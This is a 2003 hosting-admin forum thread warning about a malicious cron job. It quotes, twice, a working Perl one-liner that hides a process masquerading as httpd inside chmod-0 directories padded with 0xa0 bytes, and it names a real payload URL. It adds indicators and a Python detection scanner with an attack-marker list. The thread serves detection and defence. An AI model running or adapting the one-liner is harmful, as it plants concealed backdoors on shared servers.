  1. #1
    dgbaker (Moderator, cPanel Partner NOC)
    Join Date
    Sep 2002
    Location
    Toronto, Ontario Canada
    Posts
    2,773

    If you allow cronjobs

    If you allow users to set up cronjobs, watch for the following.

    perl -e '$e="httpd";$b="/usr/local/apache/bin/httpd -DSSL";$r="/home/username/public_html/forum/db";$l3=$l2=$l1=sprintf (".x\%s \%s \%s",chr(0xa0),chr(0xa0),chr(0xa0));chdir $r;chmod 0755,"$l1";chdir "$l1";chmod 0755,"$l2";chdir "$l2";chdir "$l3";open(CHK,">chkit");print CHK "#!/bin/sh\n./$e max.pl \"$b\"&>out\n";close CHK;chmod 0755,"chkit";`./chkit`;chdir "../..";chmod 0,"$l2";chdir "..";chmod 0,"$l1"': 489 Time(s)


    In most cases this user is an innocent victim and it is actually another user doing the real damage.

    The script that is being installed is this one.

    http://ibitzica.com/m.tgz

    Look for this in home directories, or search for CRONEXE; it is one of the variables that is set up in the PHP install file.

    If you are seeing abnormal Apache failures, extreme bandwidth usage, or suspect any backdoors or such, check for this. It will be trying to set up PSYBNC.SYSTEM.PORT1=1124

    So make sure your firewalls are blocking this port.
    Regards,
    David
    Forum Moderator

  2. #2
    FWC
    Member
    Join Date
    May 2002
    Location
    Ontario, Canada
    Posts
    354


    Thanks for the tip, David. Something else to keep an eye on.

  3. #3
    jackal (cPanel Partner NOC)
    Join Date
    Feb 2002
    Posts
    708


    Hey David, we had a signup the other day for a yearly package that had this installed; we found it within 30 minutes. We sent him around 5 emails, no response, then we suspended the account. That made him come out from hiding. We actually talked with him on ICQ after we found it. But this was a strange guy with strange responses. We finally just deleted his account.

  4. #4
    dgbaker (Moderator, cPanel Partner NOC)
    Join Date
    Sep 2002
    Location
    Toronto, Ontario Canada
    Posts
    2,773


    Good find!

    Our biggest thing with this was that it was able to install in two other people's home directories.

    Make sure to do a good, thorough search for hidden directories like .x, and search for the max.pl script as well.
    Last edited by dgbaker; 05-17-2003 at 04:33 PM.
    Regards,
    David
    Forum Moderator
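
    Added here as an editor's example, not code from the thread or from cPanel: a small Python scanner that applies the two indicators David gives in post #1 and post #4, a hidden directory named .x padded with 0xa0 bytes that is later chmod 0, and a crontab entry carrying the installer one-liner's strings. The sample directory tree is constructed, and the marker set and the two-marker threshold (chosen so a lone legitimate max.pl does not alert) are my assumptions.

```python
import os
import re
import shutil
import stat
import tempfile

# From the cron one-liner quoted above: the hidden directory name is ".x" followed by
# 0xa0 (NBSP) bytes and spaces, and the directories are chmod 0 after the payload starts.
HIDDEN_NAME = re.compile(rb"^\.x[\xa0 ]+$")
# Markers of the installer line (assumed set); two are required so that a legitimate
# max.pl on its own, like the Webmin hit later in the thread, does not raise an alert.
CRON_MARKERS = (rb"chr(0xa0)", rb"max.pl", rb"-DSSL", rb"chmod 0,")


def is_suspicious_dirname(name: bytes) -> bool:
    """True for names such as '.x' plus 0xa0/space padding, which ls shows as '.x'."""
    return HIDDEN_NAME.match(name) is not None


def find_hidden_dirs(root: bytes):
    """Walk root using bytes paths (so the undecodable 0xa0 bytes survive) and return
    (path, reason) for directories matching the name pattern or sitting at mode 0000."""
    hits = []
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            full = os.path.join(dirpath, d)
            reasons = []
            if is_suspicious_dirname(d):
                reasons.append("name is .x padded with 0xa0/space")
            if stat.S_IMODE(os.lstat(full).st_mode) == 0:
                reasons.append("mode 0000")
            if reasons:
                hits.append((full, "; ".join(reasons)))
    return hits


def scan_crontab_lines(lines):
    """Return crontab lines carrying at least two of the installer markers."""
    return [ln for ln in lines if sum(m in ln for m in CRON_MARKERS) >= 2]


def make_sample_tree():
    """Constructed fixture: a throwaway home-like tree holding one hidden dir at mode 0."""
    base = tempfile.mkdtemp(prefix="cronscan-").encode()
    hidden = os.path.join(base, b"public_html", b"forum", b"db", b".x\xa0 \xa0 \xa0")
    os.makedirs(hidden)
    os.chmod(hidden, 0)
    return base, hidden


def remove_sample_tree(base: bytes, hidden: bytes):
    os.chmod(hidden, 0o755)  # restore permissions so rmtree works without root
    shutil.rmtree(base)
```

    Run find_hidden_dirs(b"/home") on a real server; the fixture functions exist only to exercise the scanner offline.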

  5. #5
    Member
    Join Date
    Oct 2002
    Posts
    751


    Originally posted by dgbaker
    Our biggest thing with this was that it was able to install in two other people's home directories.
    That's not good.

    How did they manage to do that? And how to prevent this?

  6. #6
    jackal (cPanel Partner NOC)
    Join Date
    Feb 2002
    Posts
    708


    No max.pl found, David. Sent you a PM, David.

  7. #7
    dgbaker (Moderator, cPanel Partner NOC)
    Join Date
    Sep 2002
    Location
    Toronto, Ontario Canada
    Posts
    2,773


    Originally posted by jamesbond
    That's not good.

    How did they manage to do that? And how to prevent this?
    That's the lovely thing with that script: it allows that to happen.
    Regards,
    David
    Forum Moderator

  8. #8
    Member
    Join Date
    Mar 2003
    Posts
    863

    Re: If you allow cronjobs

    Originally posted by dgbaker
    If you allow users to set up cronjobs, watch for the following.

    perl -e '$e="httpd";$b="/usr/local/apache/bin/httpd -DSSL";$r="/home/username/public_html/forum/db";$l3=$l2=$l1=sprintf (".x\%s \%s \%s",chr(0xa0),chr(0xa0),chr(0xa0));chdir $r;chmod 0755,"$l1";chdir "$l1";chmod 0755,"$l2";chdir "$l2";chdir "$l3";open(CHK,">chkit");print CHK "#!/bin/sh\n./$e max.pl \"$b\"&>out\n";close CHK;chmod 0755,"chkit";`./chkit`;chdir "../..";chmod 0,"$l2";chdir "..";chmod 0,"$l1"': 489 Time(s)


    In most cases this user is an innocent victim and it is actually another user doing the real damage.

    The script that is being installed is this one.

    http://ibitzica.com/m.tgz

    Look for this in home directories, or search for CRONEXE; it is one of the variables that is set up in the PHP install file.

    If you are seeing abnormal Apache failures, extreme bandwidth usage, or suspect any backdoors or such, check for this. It will be trying to set up PSYBNC.SYSTEM.PORT1=1124

    So make sure your firewalls are blocking this port.
    I'm sorry, but if you have a decent firewall that only opens what you need, why would we be careful with port 1124? I don't know about you, but I don't open unused ports.

  9. #9
    Member
    Join Date
    Mar 2003
    Posts
    863


    Originally posted by dgbaker
    Good find!

    Our biggest thing with this was that it was able to install in two other people's home directories.

    Make sure to do a good, thorough search for hidden directories like .x, and search for the max.pl script as well.
    FYI, max.pl is part of the Webmin suite that we use on our server. A check resulted in the following:

    root@srv05 [/var/log]# locate max.pl
    /usr/local/src/webmin-1.060/useradmin/help/max.pl.html

  10. #10
    dgbaker (Moderator, cPanel Partner NOC)
    Join Date
    Sep 2002
    Location
    Toronto, Ontario Canada
    Posts
    2,773

    Re: Re: If you allow cronjobs

    Originally posted by sexy_guy
    I'm sorry, but if you have a decent firewall that only opens what you need, why would we be careful with port 1124? I don't know about you, but I don't open unused ports.
    Umm, neither do we, but is informing others a bad thing now? Also, if you're using software firewalls on your server, they can be taken down. Any exploit that gets through Apache and can gain root can change that port. Checking your ports regularly is called being diligent with your server security.

    Just because a firewall blocks it I am still not going to allow users to even try using this stuff. For us and the other clients I deal with, there is a zero tolerance for any cr@p.

    If you're not checking for these types of things, firewall or not, it is no wonder you seem to have abundantly more problems than most of us have encountered.
    Last edited by dgbaker; 05-18-2003 at 07:21 AM.
    Regards,
    David
    Forum Moderator

  11. #11
    dgbaker (Moderator, cPanel Partner NOC)
    Join Date
    Sep 2002
    Location
    Toronto, Ontario Canada
    Posts
    2,773


    Originally posted by sexy_guy
    FYI, max.pl is part of the Webmin suite that we use on our server. A check resulted in the following:

    root@srv05 [/var/log]# locate max.pl
    /usr/local/src/webmin-1.060/useradmin/help/max.pl.html
    So, does that mean if I name a file something that belongs to another program I can run it freely on your system no matter what the code is? Cool, can I have an account with you?

    Also that is not max.pl but is max.pl.html see the difference?

    HTML versus Perl = two different languages
    Regards,
    David
    Forum Moderator
